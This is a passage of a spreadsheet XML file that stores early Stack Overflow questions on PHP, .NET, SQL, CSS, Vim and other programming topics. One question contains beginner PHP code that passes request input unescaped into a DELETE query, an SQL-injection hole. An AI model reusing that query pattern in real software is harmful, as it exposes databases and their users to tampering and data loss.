&lt;p&gt;I am now thinking if I shall create a remote "Helper" service that allows me to squeeze all calls into one, i.e. instead of making multiple calls, I send one single call with a collection of method names and arguments. It looks a bit ugly and that's why I'm still skeptical of doing it now.&lt;/p&gt;
&lt;p&gt;I would like to know your opinions about this architecture and if you had developed a web appplication using the similar way, what're the approaches you had taken in the past to guarantee good performance? If there're any other concerns that I should really be worried about, please share it with me as well.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;yc&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sort an Array by keys based on another Array?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible in PHP to do something like this? How would you go about writing a function? Here is an example. The order is the most important thing.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$customer['address'] = '123 fake st';
$customer['name'] = 'Tim';
$customer['dob'] = '12/08/1986';
$customer['dontSortMe'] = 'this value doesnt need to be sorted';
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I'd like to do something like &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$properOrderedArray = sortArrayByArray($customer, array('name', 'dob', 'address'));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Because at the end I use a foreach() and they're not in the right order (because I append the values to a string which needs to be in the correct order and I don't know in advance all of the array keys/values).&lt;/p&gt;
&lt;p&gt;I've looked through PHP's internal array functions but it seems you can only sort alphabetically or numerically. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Make enter key behave like tab key on form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an easy way to move around controls on a form exactly the same way as the tab key?  This includes moving around cells on a datagridview etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Show tooltip when selecting item on asp:DropDownList</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an asp:DropDownList on a page that, due to the 1024x768 development standard can truncate some of the text values in the dropdown (not enough of them, apparently, to redesign the layout ), so I need to display a tooltip of the selected value &lt;em&gt;when&lt;/em&gt; a dropdown item is being selected (i.e. when the dropdown is shown and an item is being hovered over), preferably only when the text for that item is being truncated.&lt;/p&gt;
&lt;p&gt;Is this possible by default, javascript hacking or only my imagination?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I download all emails with attachments from Gmail?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I connect to Gmail and determine which messages have attachments?  I then want to download each attachment, printing out the Subject: and From: for each message as I process it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting raw HTTP request from CFHTTPMessageRef</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working with a wrapper class for &lt;code&gt;CFHTTPMessage&lt;/code&gt;, which contains a &lt;code&gt;CFHTTPMessageRef&lt;/code&gt; object to which is added the method (GET), the URL of the web application server, and a few custom headers containing the date and an authentication nonce.&lt;/p&gt;
&lt;p&gt;I'm having some problems getting the method and URL to return certain data. I think I've worked out the authentication nonce. &lt;/p&gt;
&lt;p&gt;I'd like to troubleshoot this by looking at the raw request going to the web application, and making sure everything is formatted properly. &lt;/p&gt;
&lt;p&gt;My question is: If I have a &lt;code&gt;CFHTTPMessageRef&lt;/code&gt; object (e.g. &lt;code&gt;messageRef&lt;/code&gt;), is there a way to log the raw HTTP request that comes out of this message?&lt;/p&gt;
&lt;p&gt;I've tried the following but I get a &lt;code&gt;EXC_BAD_ACCESS&lt;/code&gt; signal when I try to access its bytes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CFDataRef messageData = CFHTTPMessageCopyBody(messageRef);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks for any advice.&lt;/p&gt;
&lt;p&gt;As an alternative, is it possible to use a packet sniffer on a switched network? I can run &lt;code&gt;ettercap&lt;/code&gt; on a laptop device, but don't know how to sniff what my iPhone is doing on the local wireless network.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Comparing dates in Lingo</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I compare two dates in Lingo? To be specific, I want to know if today's date is after some fixed date. I know I can create the fixed date by using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;date("20090101")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I can get the current date using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;_system.date()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but I can't seem to directly compare the two. Do I have to parse the _system.date() to determine if it's after my fixed date? I tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if(_system.date() &amp;gt; date("20090101") then
    --do something
end if
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but that doesn't seem to work. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is there "class" in "template &lt;class x&gt;"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What does the "class" part of a template statement do?&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template &amp;lt;class T&amp;gt;
class Something
{
    public:
        Something(const T &amp;amp;something);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And what else can go there?  I usually only see "class".&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting the time zone as a UTC offset on windows and linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the simplest way to get the machine's time zone as a positive or negative UTC offset, preferably using some time of shell command?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Code Coverage tools for PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any code coverage tool available for PHP?
I wish to check the code coverage of my code and API's written in PHP, but have not been able to lay my hands on any code coverage tool for PHP, as it is more of a server side language and dynamic in nature.&lt;/p&gt;
&lt;p&gt;Does anyone know of a method by which code coverage for PHP can be executed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting week number off a date in MS SQL Server 2005?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to create an sql statement that selects the week number (NOT the day of week - or the day number in a week). I'm creating a view to select this extra information along with a couple of other fields and thus can not use a stored procedure. I'm aware that it's possible to create a UDF to do the trick, but if at all possible i'd rather only have to add a view to this database, than both a view and a function.&lt;/p&gt;
&lt;p&gt;Any ideas? Also where i come from, the week starts monday and week 1 is the first week of the year with atleast 4 days.&lt;/p&gt;
&lt;h3&gt;Related:&lt;/h3&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/274861/how-do-i-calculate-the-week-number-given-a-date"&gt;How do I calculate the week number given a date?&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Another LINQ Pivot Problem - Convert SQL Script to LINQ</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are a few questions on SO already regarding LINQ pivots and while a couple of them outline my exact problem, I can't successfully translate them to a working solution.  I feel that this is mostly due to a join in my tables.&lt;/p&gt;
&lt;p&gt;So for the benefit of all the LINQ junkies out there who love a problem, here's another puzzle for you to work out.  Please help me out (and earn some reputation points and much respect from me) by converting the following SQL stored proc script to LINQ:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ALTER PROCEDURE [dbo].[GetTimesheetForWeekById]
    @timesheetid int,
    @begindate VarChar(20),
    @enddate VarChar(20)
AS
BEGIN
    SELECT T.TaskName,
    	SUM(
    		case DATEPART(weekday, TE.StartTime)
    			WHEN 1 THEN DATEDIFF(minute, TE.StartTime, TE.EndTime) ELSE 0 END
    		) AS Sunday,
    	SUM(
    		case DATEPART(weekday, TE.StartTime)
    			when 2 THEN DATEDIFF(minute, TE.StartTime, TE.EndTime) ELSE 0 END
    		) AS Monday,
    	SUM(
    		case DATEPART(weekday, TE.StartTime)
    			when 3 THEN DATEDIFF(minute, TE.StartTime, TE.EndTime) ELSE 0 END
    		) AS Tuesday,
    	SUM(
    		case DATEPART(weekday, TE.StartTime)
    			when 4 THEN DATEDIFF(minute, TE.StartTime, TE.EndTime) ELSE 0 END
    		) AS Wednesday,
    	SUM(
    		case DATEPART(weekday, TE.StartTime)
    			when 5 THEN DATEDIFF(minute, TE.StartTime, TE.EndTime) ELSE 0 END
    		) AS Thursday,
    	SUM(
    		case DATEPART(weekday, TE.StartTime)
    			when 6 THEN DATEDIFF(minute, TE.StartTime, TE.EndTime) ELSE 0 END
    		) AS Friday,
    	SUM(
    		case DATEPART(weekday, TE.StartTime)
    			when 6 THEN DATEDIFF(minute, TE.StartTime, TE.EndTime) ELSE 0 END
    		) AS Saturday
    FROM Tasks T
    INNER JOIN TimeEntries TE on T.TaskID = TE.TaskID
    WHERE TE.StartTime BETWEEN 
    	(CONVERT(datetime, @begindate, 103)) AND (CONVERT(datetime, @enddate, 103))
    AND TE.TimesheetID = @timesheetid
    GROUP BY T.TaskName
END
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>member control through admin account using php</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to php.
I made a member registration on login page and adm too. So inside admin I wanted to get the list of the members and delete the members I dont want. So I took the a code from a sample code for phone book from &lt;a href="http://localhost/xamp" rel="nofollow"&gt;http://localhost/xamp&lt;/a&gt;  and editted it to my requirement I am able to retrieve the members but unable to delete the members. See the code below:&lt;/p&gt;
&lt;p&gt;
&lt;pre&gt;&lt;code&gt;require_once('../config.php');
//Array to store validation errors
$errmsg_arr = array();
//Validation error flag
$errflag = false;
//Connect to mysql server
$link = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD);
if(!$link) {
	die('Failed to connect to server: ' . mysql_error());
}
//Select database
$db = mysql_select_db(DB_DATABASE);
if(!$db) {
	die("Unable to select database");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;?&gt;
    &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;body&amp;gt;
	&amp;amp;nbsp;&amp;lt;p&amp;gt;
	&amp;lt;h2&amp;gt;&amp;lt;?php echo "User list"; ?&amp;gt;&amp;lt;/h2&amp;gt;
	&amp;lt;table border="0" cellpadding="0" cellspacing="0"&amp;gt;
		&amp;lt;tr bgcolor="#f87820"&amp;gt;
			&amp;lt;td&amp;gt;&amp;lt;img src="img/blank.gif" alt="" width="10" height="25"&amp;gt;&amp;lt;/td&amp;gt;
			&amp;lt;td class="tabhead"&amp;gt;&amp;lt;img src="img/blank.gif" alt="" width="150" height="6"&amp;gt;&amp;lt;br&amp;gt;&amp;lt;b&amp;gt;&amp;lt;?php echo $TEXT['phonebook-attrib1']; ?&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
			&amp;lt;td class="tabhead"&amp;gt;&amp;lt;img src="img/blank.gif" alt="" width="150" height="6"&amp;gt;&amp;lt;br&amp;gt;&amp;lt;b&amp;gt;&amp;lt;?php echo $TEXT['phonebook-attrib2']; ?&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
			&amp;lt;td class="tabhead"&amp;gt;&amp;lt;img src="img/blank.gif" alt="" width="150" height="6"&amp;gt;&amp;lt;br&amp;gt;&amp;lt;b&amp;gt;&amp;lt;?php echo $TEXT['phonebook-attrib3']; ?&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
			&amp;lt;td class="tabhead"&amp;gt;&amp;lt;img src="img/blank.gif" alt="" width="50" height="6"&amp;gt;&amp;lt;br&amp;gt;&amp;lt;b&amp;gt;&amp;lt;?php echo $TEXT['phonebook-attrib4']; ?&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;
			&amp;lt;td&amp;gt;&amp;lt;img src="img/blank.gif" alt="" width="10" height="25"&amp;gt;&amp;lt;/td&amp;gt;
		&amp;lt;/tr&amp;gt;
		&amp;lt;?php
			$firstname=$_REQUEST['firstname'];
			$lastname=$_REQUEST['lastname'];
			$phone=$_REQUEST['phone'];
			if($_REQUEST['action']=="del")
			{
					$result=mysql_query("DELETE FROM members WHERE member_id={$_REQUEST['member_id']}");
			}
			$result=mysql_query("SELECT member_id,firstname,lastname,login FROM members ORDER BY lastname");
			$i = 0;
			while($row = mysql_fetch_array($result)) {
				if ($i &amp;gt; 0) {
					echo "&amp;lt;tr valign='bottom'&amp;gt;";
					echo "&amp;lt;td bgcolor='#ffffff' height='1' style='background-image:url(img/strichel.gif)' colspan='6'&amp;gt;&amp;lt;/td&amp;gt;";
					echo "&amp;lt;/tr&amp;gt;";
				}
				echo "&amp;lt;tr valign='middle'&amp;gt;";
				echo "&amp;lt;td class='tabval'&amp;gt;&amp;lt;img src='img/blank.gif' alt='' width='10' height='20'&amp;gt;&amp;lt;/td&amp;gt;";
				echo "&amp;lt;td class='tabval'&amp;gt;&amp;lt;b&amp;gt;".$row['lastname']."&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;";
				echo "&amp;lt;td class='tabval'&amp;gt;".$row['firstname']."&amp;amp;nbsp;&amp;lt;/td&amp;gt;";
				echo "&amp;lt;td class='tabval'&amp;gt;".$row['member_id']."&amp;amp;nbsp;&amp;lt;/td&amp;gt;";
				echo "&amp;lt;td class='tabval'&amp;gt;&amp;lt;a onclick=\"return confirm('".$TEXT['userlist-sure']."');\" href='userlist.php?action=del&amp;amp;amp;member_1d=".$row['member_id']."'&amp;gt;&amp;lt;span class='red'&amp;gt;[".$TEXT['userlist-button1']."]&amp;lt;/span&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;";
				echo "&amp;lt;td class='tabval'&amp;gt;&amp;lt;/td&amp;gt;";
				echo "&amp;lt;/tr&amp;gt;";
				$i++;
			}
			echo "&amp;lt;tr valign='bottom'&amp;gt;";
			echo "&amp;lt;td bgcolor='#fb7922' colspan='6'&amp;gt;&amp;lt;img src='img/blank.gif' alt='' width='1' height='8'&amp;gt;&amp;lt;/td&amp;gt;";
			echo "&amp;lt;/tr&amp;gt;";
		?&amp;gt;
	&amp;lt;/table&amp;gt;
&amp;lt;/body&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;/p&gt;
&lt;p&gt;I haven't editted it that properly and the looks in all.&lt;/p&gt;
&lt;p&gt;Please help me in making it able to delete the members also.&lt;/p&gt;
&lt;p&gt;I didn't understand what .$TEXT['userlist-button1'].,'".$TEXT['userlist-sure']. variables are?
I also want to include an approved and disapproved radio button in table for each members.&lt;/p&gt;
&lt;p&gt;How can I do that?&lt;/p&gt;
&lt;p&gt;Please if you can help me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I don't want a "close window" menu item in the task bar context menu for my WPF window</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't want a "close window" menu item in the task bar context menu for my WPF window. My intention is to annoy the user.&lt;/p&gt;
&lt;p&gt;Thank you!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calculating a LookAt matrix</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm in the midst of writing a 3d engine and I've come across the LookAt algorithm described in the DirectX documentation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;zaxis = normal(At - Eye)
xaxis = normal(cross(Up, zaxis))
yaxis = cross(zaxis, xaxis)
 xaxis.x           yaxis.x           zaxis.x          0
 xaxis.y           yaxis.y           zaxis.y          0
 xaxis.z           yaxis.z           zaxis.z          0
-dot(xaxis, eye)  -dot(yaxis, eye)  -dot(zaxis, eye)  l
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I get how it works on the rotation side, but what I don't quite get is why it puts the translation component of the matrix to be those dot products. Examining it a bit it seems that it's adjusting the camera position by a small amount based on a projection of the new basis vectors onto the position of the eye/camera.&lt;/p&gt;
&lt;p&gt;The question is why does it need to do this? What does it accomplish?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Report section style list numbering in CSS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Now I know about the "normal" CSS list styles (roman, latin, etc) and certainly in years past they were somewhat inflexible in not allowing things like:&lt;/p&gt;
&lt;p&gt;(a)&lt;/p&gt;
&lt;p&gt;or &lt;/p&gt;
&lt;p&gt;a)&lt;/p&gt;
&lt;p&gt;only&lt;/p&gt;
&lt;p&gt;a.&lt;/p&gt;
&lt;p&gt;Now I believe that you can get an effect like the above with the :before and :after pseudo-elements.  Is that correct?  And whats the browser compatibility like if you can?&lt;/p&gt;
&lt;p&gt;My main question however is that I want to have report style numbering:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Introduction
1.1 Objectives
1.2 Assumptions
1.3 Limitations
1.3.1 ...&lt;/li&gt;
&lt;li&gt;New Section
...&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;and so on.&lt;/p&gt;
&lt;p&gt;Can CSS do this and, if so, whats the browser compatibility like?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How long before ASP.NET MVC becomes widely used in industry?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to decide whether to learn ASP.NET MVC (or to spend the time learning another technology that interests me). I know that it is an elegant framework, but I am trying to assess my future job opportunities if I invest in this skill. In your estimation, how long is it going to be before demand for ASP.NET MVC developers rivals that for developers in the other top web dev frameworks? Is it a matter of a year? 2 years? 3+? On a related note, do you see use of ASP.NET MVC surpassing classic ASP.NET in the foreseeable future? Scott Guthrie says the two will exist side by side, but I'm curious just how much of the mind share ASP.NET MVC is expected to grab.&lt;/p&gt;
&lt;p&gt;I know this is a speculative question; I'm just interested in your subjective hunches.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to display xml in javascript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As the question says, it just escaped my memory how to display xml in javascript, I want to display some source xml within an div on a page, that sits next to the processed result of the xml in another div.&lt;/p&gt;
&lt;p&gt;Can't remember if there was an equivalent to javascript's escape to convert entities on the client &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: the xml files are served as is from the server, so I need a client side solution&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: the main problem is XML doesn't render correctly in most browsers, all the brackets and attributes disappear, leaving you with text that doesn't look like xml&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL tool or query that suggests table structure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I used a query a few weeks ago in MySQL that described a table and suggested possible improvements to its structure. For example, if I have an int field but only the numbers 1-3 in that field, it will suggest set(1,2,3) as the type.&lt;/p&gt;
&lt;p&gt;I think I was using phpMyAdmin but I've been through all the functions I can find - Analyze, Describe, Explain, Optimize, etc - to no avail. I can't for the life of me remember what the query was!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.net architecture: Creating a IRepository&lt;T&gt; generically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a generic repository interface which allows me to add, find, update and delete objects of different types. I have then implemented two concrete repositories and can switch them around without changing the application. Everything is wonderfully disconnected. But I have hit a snag. The code inside my repository methods just feels wrong and I cannot figure out how to do it better. Here is a snippet of my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class OracleRepository&amp;lt;T&amp;gt; : IRepository&amp;lt;T&amp;gt; where T : new()
{
    public IQueryable&amp;lt;T&amp;gt; GetAll()
    {
        if (typeof(T) == typeof(Object1))
        {
            return (IQueryable&amp;lt;T&amp;gt;)DataAccess.GetAllObject1().AsQueryable();
        }
        if (typeof(T) == typeof(Object2))
        {
            return (IQueryable&amp;lt;T&amp;gt;)DataAccess.GetAllObject2().AsQueryable();
        }
        throw new NotImplementedException();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that my DataAccess (creates objects from a datareader) is not generic and has specific methods for each type of object that it supports. &lt;/p&gt;
&lt;p&gt;Can I rewrite the above so that I avoid the list of if-then-elseif using generics or otherwise?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Version control of MDF files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a web app (it is in asp.net mvc framework beta in visual studio 2008) and want to version control it. How do I version control the database files (*.mdf, binary) in  the App_Data folder. &lt;/p&gt;
&lt;p&gt;Is there a way to just store the tables-and-whatever definition of the database or do I really need to version control it's contents?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I convert a REG_BINARY value from the registry into a string ? (vb.net)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a registry value which is stored as a binary value (REG_BINARY) holding information about a filepath. The value is read out into an byte array. But how can I transform it into a readable string?&lt;/p&gt;
&lt;p&gt;I have read about system.text.encoding.ASCII.GetString(value) but this does not work. As far as I got to know the registry value is arbitrary binary data and not ASCII which is the reason for the method to produce useless data.&lt;/p&gt;
&lt;p&gt;Does anybody know how I can convert the data? &lt;/p&gt;
&lt;p&gt;Sample:
(A piece of the entry)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;01 00 00 00 94 00 00 00 14 00 00 00 63 00 3A 00 5C 00 
70 00 72 00 6F 00 67 00 72 00 61 00 6D 00 6d 00 65 00 
5C 00 67 00 65 00 6D 00 65 00 69 00 6E 00 73 00 61 00 
6D 00 65 00 20 00 64 00 61 00 74 00 65 00 69 00 65 00 
6E 00 5C
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Due to the regedit this is supposed to be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;............c.:.\.p.r.o.g.r.a.m.m.e.\.g.e.m.e.i.n.s.a.m.e. .d.a.t.e.i.e.n.\
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The entry itself was created from Outlook. It's an entry for an disabled addin item (resiliency)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL statement problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT    idcallhistory3, callid, starttime, answertime, endtime, duration,
          is_answ, is_fail, is_compl, is_fromoutside, mediatype, from_no,
          to_no, callerid, dialednumber, lastcallerid, lastdialednumber,
          group_no, line_no
FROM      "public".callhistory3
WHERE     (starttime &amp;gt;= ?) AND (endtime &amp;lt;= ?) AND (is_fromoutside = ?) 
          AND (from_no = ?) AND (to_no = ?)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is I need to pass one value for ? and get all the result without filter, some thing like *&lt;/p&gt;
&lt;p&gt;Any help?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an equivalent of ASF View for MP4 files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on our encoding software, and have come across a strange issue where files in a 16:9 aspect ratio are being played in 4:3 in some players, post-transcode from WMV to MP4. Using ASF view I can see that the source WMV file appears to have incorrect data in its BITMAPINFOHEADER structure (it reports that is has 4:3 dimensions but is actually 16:9), but is there an equivalent tool for MP4 files so I can check whether this problem has been carried through to the transcoded file?&lt;/p&gt;
&lt;p&gt;I want to read the metadata that is embedded in the stream, rather than using a tool that renders it using DirectShow/FFmpeg/other as these appear to do some mangling and report the correct aspect ratio.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Built-in helper to parse User.Identity.Name into Domain\Username</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any built-in utility or helper to parse &lt;code&gt;HttpContext.Current.User.Identity.Name&lt;/code&gt;, e.g. &lt;code&gt;domain\user&lt;/code&gt; to get separately domain name if exists and user?&lt;/p&gt;
&lt;p&gt;Or is there any other class to do so?&lt;/p&gt;
&lt;p&gt;I understand that it's very easy to call &lt;code&gt;String.Split("\")&lt;/code&gt; but just interesting&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sniffing queries to SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to sniff SQL queries sent to a SQL Server db on any level (above transport level)?   Perhaps there's some kind of a tracer in ASP.NET or built-in log in SQL Server ? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Friendly Byte Formatting in Rails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to format an integer representation of bytes into something friendly, and I'm hoping that there's a utility function in Ruby or in Rails that will do that formatting for me (to perpetuate my laziness, of course.)&lt;/p&gt;
&lt;p&gt;I'm looking for something that would look like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;format_bytes(1024)     -&amp;gt; "1 KB"
format_bytes(1048576)  -&amp;gt; "1 MB"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looks like there's some stuff in ActiveSupport to do it the other way around, but I haven't found a way to do it in this direction.&lt;/p&gt;
&lt;p&gt;If there isn't one that exists, does anyone have a particularly elegant solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to dynamically invoke a chain of delegates in VB.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does someone knows if it's possible to dynamically create a call chain and invoke it?&lt;/p&gt;
&lt;p&gt;Lets say I have two classes A &amp;amp; B:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class A
    public function Func() as B
        return new B()
    end function
end class
public class B
   public function Name() as string
      return "a string";
   end function
end class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to be able to get &lt;em&gt;MethodInfo&lt;/em&gt; for both &lt;em&gt;Func()&lt;/em&gt; &amp;amp; &lt;em&gt;Name()&lt;/em&gt; and invoke them dynamically so that I can get a call similar to &lt;em&gt;A.Func().Name()&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;I know I can use &lt;em&gt;Delegate.CreateDelegate&lt;/em&gt; to create a delegate I can invoke from the two &lt;em&gt;MethodInfo&lt;/em&gt; objects but this way I can only call the two functions separately and not as part of a call chain.&lt;/p&gt;
&lt;p&gt;I would like two solutions one for .NET 3.5 using expression tree and if possible a solution that is .NET 2.0 compatible as well&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vim: NERD_tree Plugin. Need help understanding a bloggers .vimrc addition to streamline this plugin</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm basically a beginner when it comes to Vim, nonetheless I do know the basic things (open files, edit, move around, basic grep, .vimrc, etc)&lt;/p&gt;
&lt;p&gt;I would submit this link first&lt;/p&gt;
&lt;p&gt;&lt;a href="http://weblog.jamisbuck.org/2008/11/17/vim-follow-up" rel="nofollow"&gt;http://weblog.jamisbuck.org/2008/11/17/vim-follow-up&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;If you scroll down to where it says "NERD___tree", it explains what it is and gives a link to the home page. I have already gotten NERD_tree installed, so far so good.&lt;/p&gt;
&lt;p&gt;Only thing is, this guy (JamisBuck) adds a line to the .vimrc file to streamline it's usage (I'm guessing to toggle between NERD_tree and the actual file, because as far as I can tell, there is no quick way to do it other than typing in:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;:NERDTree
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Every time which is less than desirable. The follwing is the code he adds to the .vimrc file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;map &amp;lt;leader&amp;gt;d :execute 'NERDTreeToggle ' . getcwd()&amp;lt;CR&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;He doesn't explain exactly what is is and/or how to use it, so If someone could give me a short explanation and/or point me towards a resource to learn more about this, that would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set LC_ALL and LANG under IIS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to run some Perl CGI scripts under IIS. I get the following message :&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
    LC_ALL = (unset),
    LANG = (unset)
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;I found out that the problem occurs only when I "use" an internal library of ours but it's really a big one (using many other stuff) so I would prefer to know where to look. When I run the same script from the command line, the script runs just fine. I tried to set "LANG" to "C", then "LC_ALL" to "C" but it had no effect.&lt;/p&gt;
&lt;p&gt;Any pointers welcome!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Strange caching of .js file in firefox/tomcat/eclipse</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing &lt;code&gt;.jsp&lt;/code&gt; using eclipse and tomcat.  &lt;/p&gt;
&lt;p&gt;My &lt;code&gt;.jsp&lt;/code&gt; outputs html to pull in some javascript from a &lt;code&gt;.js&lt;/code&gt; file.  The &lt;code&gt;jsp&lt;/code&gt; outputs the code which hooks up the function &lt;code&gt;mapTool&lt;/code&gt; to the mousedown event.  &lt;code&gt;imfMapFunctions5101.js&lt;/code&gt; contains the mapTool(e) function.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The changes I make to the .js file do not take affect when I run in firefox, although they do when I run in IE.&lt;/strong&gt;  &lt;/p&gt;
&lt;p&gt;in the .jsp:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;out.println("&amp;lt;script language=\"JavaScript\" type=\"text/javascript\" src=\"imfMapFunctions5101.js\"&amp;gt;&amp;lt;/script&amp;gt;");  
....    
out.println("function startup() {");
      out.println("  hideLayer(\"loadMap\");");
      out.println("  if (document.layers) {");
      out.println("    document.captureEvents(Event.MOUSEDOWN | Event.MOUSEMOVE | Event.MOUSEUP);");
      out.println("  }");
      out.println("  document.onmousedown = mapTool;");
      out.println("  **alert(document.onmousedown);**") //pops up the event code in the browser
; 
.......
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The javascript event code in &lt;code&gt;imfMapFunctions5101.js&lt;/code&gt;:&lt;/p&gt;
